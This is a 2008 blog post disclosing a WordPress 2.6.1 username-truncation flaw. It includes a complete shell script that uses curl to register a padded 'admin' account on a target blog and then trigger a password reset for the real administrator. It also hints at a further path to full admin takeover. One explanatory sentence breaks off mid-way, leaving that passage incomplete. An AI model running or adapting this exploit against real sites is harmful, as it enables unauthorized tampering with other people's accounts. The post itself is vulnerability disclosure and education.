Update 09-08:
Quickly after posting this admin password resetter script I pulled the article,
since I found it is way too obvious how to completely take over the admin account based on this wordpress flaw.
But, since the info is finally out at milw0rm anyway
and the next step might not be as obvious as I thought - the publisher of that text
did not see it and even explicitely states this would be "not critical vuln"
- I might just as well go ahead and republish this old article.. :)
Looking at the source of php webapps usually is quite funny. Even when projects have been audited by a lot of people, in huge applications it is more or less unachievable to circumvent any unindented use of functions.
Like in this example: wordpress, one of the most often installed webapps worldwide, there might be few php codes audited by more people. Still, there remains the opportunity to find things like the following within just a couple of minutes.
The following exploit might just lead to some trouble for a blog's admin: on a
blog which allows user registration, it will allow anybody to quickly and very
easily reset the admin password - which can usually only be achieved by the admin
confirming the reset-request via mail.
Luckily only the true admin will receive the new password, so the direct impact ist very
limited.
It is however possible - and actually rather easy - to take this one step further and
completely take over the admin account, locking the original admin out. I won't go into
details of that for the time being (this post is meant as an example
of a very widespread security vulnerability, namely the missing truncation of
overlong input strings, and not as an article about wordpress 0days).
Bug in wordpress in this case is that when registering a new user, the
length of the login-name is not checked. Which is a problem since the sql
table has a limit of 60 characters, so checking if 'admin
An incredibly common mistake in almost any php application you may happen to look into. This allows
creation of a second 'admin' account - in this case you cannot log into it, but
that is not a general rule.
Since this is a very common bug, I will release the quick exploit for educational purposes:
#!/bin/sh
# ez wpress admin-password resetter
# works w/ wordpress 2.6.1
# iso 2008
BLOG=$1
EMAIL=$2
CURL=/usr/bin/curl
if [ "X$EMAIL" = "X" ]; then
echo "[!] Usage: $0 blogurl myemail"
echo " fe: $0 http://31337.biz/blog ruler@31337.biz"
exit
fi
if [ -e $CURL ]; then
echo "[-] registering new admin user"
$CURL $BLOG/wp-login.php?action=register -s \
-d user_login="admin`perl -e 'print " "x60'`x" \
-d user_email=$EMAIL 2>&1 >/dev/null
echo "[x] done"
echo "[-] requesting password resetlink"
$CURL $BLOG/wp-login.php?action=lostpassword -s \
-d user_login=$EMAIL 2>&1 /dev/null
cat <<SHIT
[x] done.
click on link in mail once to reset pass of real admin,
second click will reset your own password (you cannot login, though)
real admin will receive a notification-mail including the new password.
SHIT
fi
Although you should not really be able to create any damage with this script, you are not allowed to use it on any other blog than your own, for obvious reasons.